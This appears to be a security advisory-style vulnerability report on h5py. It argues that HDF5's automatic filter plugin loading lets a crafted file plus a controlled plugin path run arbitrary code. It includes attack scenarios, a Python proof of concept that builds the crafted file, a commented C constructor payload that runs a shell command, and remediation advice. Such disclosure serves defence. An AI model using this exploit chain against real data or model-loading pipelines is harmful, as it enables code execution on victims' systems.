h5py-filter-plugin-rce-poc / h5py-01-filter-plugin-code-execution.md

Upload h5py-01-filter-plugin-code-execution.md with huggingface_hub

6f3a7c5 verified 11 days ago

preview code

raw

history blame contribute delete

6.45 kB

Arbitrary Code Execution via Automatic HDF5 Filter Plugin Loading in h5py

Target

Project: h5py/h5py
URL: https://github.com/h5py/h5py
Component: HDF5 filter pipeline / dataset read path
CWE: CWE-94 (Improper Control of Generation of Code / Code Injection)

Severity: HIGH

Summary

When h5py opens an HDF5 file and reads a dataset that uses a custom (non-builtin) compression filter, the underlying HDF5 library automatically searches for and loads a shared library (.so/.dll) filter plugin from directories in the plugin search path. h5py exposes APIs (h5py.h5pl) to manipulate this search path but does nothing to restrict or disable this automatic dynamic loading behavior. A crafted HDF5 file specifying a custom filter ID will cause HDF5 to load and execute arbitrary code from a shared library placed in the plugin search path -- which can be controlled via the HDF5_PLUGIN_PATH environment variable or through the h5py.h5pl.append()/prepend() APIs.

Vulnerable Code

File: `h5py/h5py/h5z.pyx` (lines 102-121)

@with_phil
def register_filter(uintptr_t cls_pointer_address):
    '''(INT cls_pointer_address) => BOOL

    Register a new filter from the memory address of a buffer containing a
    ``H5Z_class1_t`` or ``H5Z_class2_t`` data structure describing the filter.

    `cls_pointer_address` can be retrieved from a HDF5 filter plugin dynamic
    library::

        import ctypes

        filter_clib = ctypes.CDLL("/path/to/my_hdf5_filter_plugin.so")
        filter_clib.H5PLget_plugin_info.restype = ctypes.c_void_p

        h5py.h5z.register_filter(filter_clib.H5PLget_plugin_info())

    '''
    return <int>H5Zregister(<const void *>cls_pointer_address) >= 0

File: `h5py/h5py/h5pl.pyx` (lines 20-25)

cpdef append(const char* search_path):
    """(STRING search_path)
    Add a directory to the end of the plugin search path.
    """
    H5PLappend(search_path)

File: `h5py/h5py/_hl/filters.py` (lines 295-299)

When a dataset is created with an integer filter ID, h5py passes it directly to HDF5:

    elif isinstance(compression, int):
        if not allow_unknown_filter and not h5z.filter_avail(compression):
            raise ValueError("Unknown compression filter number: %s" % compression)
        plist.set_filter(compression, h5z.FLAG_OPTIONAL, compression_opts)

Automatic Plugin Loading (HDF5 library behavior)

When H5Dread() is called on a dataset with a filter ID that is not currently registered, HDF5 searches the plugin path for .so/.dll files, loads them via dlopen(), calls H5PLget_plugin_info() to obtain the filter class, and registers it automatically. This happens transparently inside:

h5py/h5py/_proxy.templ.pyx line 120: H5Dread(dset, mtype, mspace, fspace, dxpl, progbuf)
h5py/h5py/_proxy.templ.pyx line 151: H5Dread(dset, dstype, cspace, fspace, dxpl, conv_buf)

Exploitation

Attack Scenario 1: Crafted HDF5 file + environment manipulation

An attacker sets HDF5_PLUGIN_PATH to a directory they control (e.g., via .bashrc manipulation, Docker environment, or CI/CD configuration)
They place a malicious .so file in that directory implementing the H5PLget_plugin_info symbol
They provide a crafted HDF5 file with a dataset using a custom filter ID matching their plugin
When the victim opens the file and reads the dataset with h5py, the malicious shared library is automatically loaded and its code executes

Attack Scenario 2: h5pl API abuse in shared environments

In applications where users can influence the plugin path via h5py.h5pl.append() before file loading:

import h5py

# Attacker injects malicious plugin path
h5py.h5pl.append(b'/attacker/controlled/path')

# Later, when legitimate code reads a crafted HDF5 file:
with h5py.File('crafted.h5', 'r') as f:
    data = f['dataset'][:]  # Triggers plugin loading -> RCE

Proof of Concept

import h5py
import numpy as np
import struct
import tempfile
import os

# Step 1: Create a malicious shared library (filter plugin)
# In practice, compile a .so with H5PLget_plugin_info that runs arbitrary code
# For demonstration, this would be:
#   gcc -shared -o malicious_filter.so -fPIC malicious_filter.c
# Where malicious_filter.c contains:
#   #include <stdlib.h>
#   void __attribute__((constructor)) init() { system("id > /tmp/pwned"); }

# Step 2: Set plugin path
os.environ['HDF5_PLUGIN_PATH'] = '/tmp/malicious_plugins'

# Step 3: Create HDF5 file with custom filter
CUSTOM_FILTER_ID = 32000  # Use a non-standard filter ID

with h5py.File('/tmp/crafted.h5', 'w') as f:
    # Use allow_unknown_filter to bypass availability check during creation
    f.create_dataset(
        'payload',
        data=np.zeros(100),
        compression=CUSTOM_FILTER_ID,
        compression_opts=(0,),
        chunks=(100,),
        allow_unknown_filter=True
    )

# Step 4: When any user reads this file, the filter plugin is loaded
with h5py.File('/tmp/crafted.h5', 'r') as f:
    data = f['payload'][:]  # This triggers automatic plugin search and dlopen()

Impact

Arbitrary code execution in the context of the process reading the HDF5 file
This is particularly dangerous in:
- Data science pipelines that process untrusted HDF5 files
- ML model loading (Keras/TensorFlow models are stored as HDF5)
- Scientific data sharing workflows
- Jupyter notebook environments processing external data
h5py provides no mechanism to disable automatic filter plugin loading
The allow_unknown_filter=True parameter on dataset creation is designed for this workflow, explicitly supporting the use case

Remediation

Provide an option to disable automatic filter plugin loading when opening files for reading. HDF5 1.10+ supports H5PLset_loading_state() to disable plugin loading.
Add a security warning in documentation about the risks of processing untrusted HDF5 files
Consider defaulting to disabled plugin loading for read-only file access, requiring explicit opt-in
Validate or restrict plugin paths added via h5pl.append()/prepend()

References

HDF5 Dynamic Plugin Loading: https://docs.hdfgroup.org/hdf5/develop/group___h5_p_l.html
HDF5 Filter Plugins: https://github.com/HDFGroup/hdf5_plugins
h5py filter documentation: https://docs.h5py.org/en/stable/high/dataset.html#filter-pipeline